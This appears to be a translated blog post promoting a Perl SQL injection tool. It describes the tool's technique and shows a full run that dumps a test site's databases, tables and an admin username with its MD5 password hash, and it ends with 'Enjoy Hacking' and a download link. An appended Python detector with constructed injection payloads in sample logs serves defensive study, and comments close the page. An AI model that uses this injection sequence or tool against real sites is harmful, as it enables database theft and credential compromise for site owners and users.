MySQL Injection Tool and a Simple Test (Perl)
The order by check guesses the column count by binary search (halving the range each step); you can freely choose which database to dump, the default being the current database.
When dumping the database list it uses group_concat(), so a single GET does the job. Because there are sometimes many tables and I want all of them to show up, dumping table_name uses limit x,1 instead, so each get() reads only one record. You can't have it both ways. Basically, however a person injects by hand, that is how this little program injects.
A simple test run looks like this:
alone@alone-desktop:~/perl$ ./sql51.pl 'http://127.1/vnews.php?print=1&id=2' 'good'
|=—————————————–=|
|=———[ SQL Injector V1.0 ]———–=|
|=———–[ By hackerxwar ]————-=|
|=—————————————–=|
[*] Test and 1=1
[*] Test and 1=2
[+] Vulnerable!!!
[*] Test Mysql Version = 4.x
[-] Mysql Version Is Not 4.x
[*] Test Mysql Version = 5.x
[+] Mysql Version is 5.x
[*] Test Order By Query…
[*] Test order by 25--
[*] Test order by 13--
[*] Test order by 7--
[*] Test order by 4--
[*] Test order by 5--
[*] Test order by 6--
[+] Found Order By 6
[*] Getting Basic Info…
[+] Data User: root@localhost
[+] Database : sqlin
[*] Check file_priv…
[+] file_priv :Y
[*] mysql5 will dump dbs…
[*] Dumping databases …
[+] Dump dbs :
information_schema
mysql
sqlin
Enter the database to dump:
Default is The current database [sqlin]
[*] Dumping table_name from database [sqlin]…
Ext_JCCHP_Company
Ext_JCCMS_Attachments
Ext_JCCMS_Category
Ext_JCCMS_Item
Ext_JCRack_Product
Ext_JCStaticPage
Ext_JCUser
Ext_JCUser_Purview
Ext_JCUser_PurviewLink
Ext_JCVisitorsBook_Words
W3B_ServiceDonames
W3B_Services
admin
uni_addons
uni_articles
uni_comments
uni_custom_pages
uni_files
uni_files_ctg
uni_gallery
uni_gallery_ctg
uni_menu
uni_menu_ctg
uni_news
uni_patterns
uni_patterns_ctg
uni_rmenu
uni_settings
uni_styles
uni_users
Enter the table to dump: uni_users
[*] Dumping column_name from table [sqlin.uni_users]…
[+] Dump column_name from table [uni_users]:
id
login
email
password
access
[*] Dump the conten from table [uni_users]…
Enter the username field: login
Enter the password field: password
[+] Dump [login]:[password] from table [uni_users]:
admin:21232f297a57a5a743894a0e4a801fc3
[+] Done…
[+] Enjoy Hacking…
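From the defender's side, the test output above is also a recognisable access-log signature: the "and 1=1 / and 1=2" pair, a run of "order by N--" requests from one client while it binary-searches the column count, then reads of information_schema via group_concat(). The following detection script is an added example, not part of the original post or the tool; the log lines are constructed to mirror that sequence (Apache/nginx combined format is assumed).

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post); they mirror the
# probe sequence in the tool's output: and 1=1 / and 1=2, an "order by N--" binary
# search, then a group_concat() read of information_schema. One benign request too.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vnews.php?print=1&id=2+and+1%3D1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /vnews.php?print=1&id=2+and+1%3D2 HTTP/1.1" 200 3310
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /vnews.php?print=1&id=2+order+by+25-- HTTP/1.1" 200 3310
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /vnews.php?print=1&id=2+order+by+13-- HTTP/1.1" 200 3310
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /vnews.php?print=1&id=2+order+by+7-- HTTP/1.1" 200 3310
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /vnews.php?print=1&id=2+order+by+6-- HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /vnews.php?print=1&id=2+and+(select+group_concat(schema_name)+from+information_schema.schemata) HTTP/1.1" 200 3310
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /vnews.php?print=1&id=2 HTTP/1.1" 200 5120
"""

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/')
BOOL_RE = re.compile(r'\band\s+1\s*=\s*([12])\b', re.I)
ORDER_RE = re.compile(r'\border\s+by\s+(\d+)\s*--', re.I)
SCHEMA_RE = re.compile(r'information_schema|group_concat\s*\(', re.I)

def analyse(log_text):
    """Return {client_ip: sorted list of findings} for the probe sequence above."""
    bools = defaultdict(set)   # ip -> {"1", "2"} seen in "and 1=x"
    orders = defaultdict(set)  # ip -> distinct column counts tried with "order by N--"
    schema = set()             # ips that touched information_schema / group_concat
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, url = m.group(1), unquote_plus(m.group(2))  # decode %3D and '+'
        for b in BOOL_RE.findall(url):
            bools[ip].add(b)
        for n in ORDER_RE.findall(url):
            orders[ip].add(int(n))
        if SCHEMA_RE.search(url):
            schema.add(ip)
    findings = defaultdict(list)
    for ip in set(bools) | set(orders) | schema:
        if bools[ip] == {"1", "2"}:
            findings[ip].append("boolean-tautology probe (and 1=1 / and 1=2)")
        if len(orders[ip]) >= 3:   # one ORDER BY is normal; a series is a column-count search
            findings[ip].append("order-by column-count search: %s" % sorted(orders[ip]))
        if ip in schema:
            findings[ip].append("information_schema / group_concat enumeration")
    return {ip: sorted(v) for ip, v in findings.items()}
```

Running analyse(SAMPLE_LOG) flags only 10.0.0.5 with all three findings; the single benign request from 10.0.0.9 produces nothing, and the per-client grouping is what separates the binary-search series from an ordinary sorted listing.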
Download: xmysql-v1.pl.tar
Haha, dropped by. Taking a look.
Once I've finished the network engineer exam, I'll make the switch too.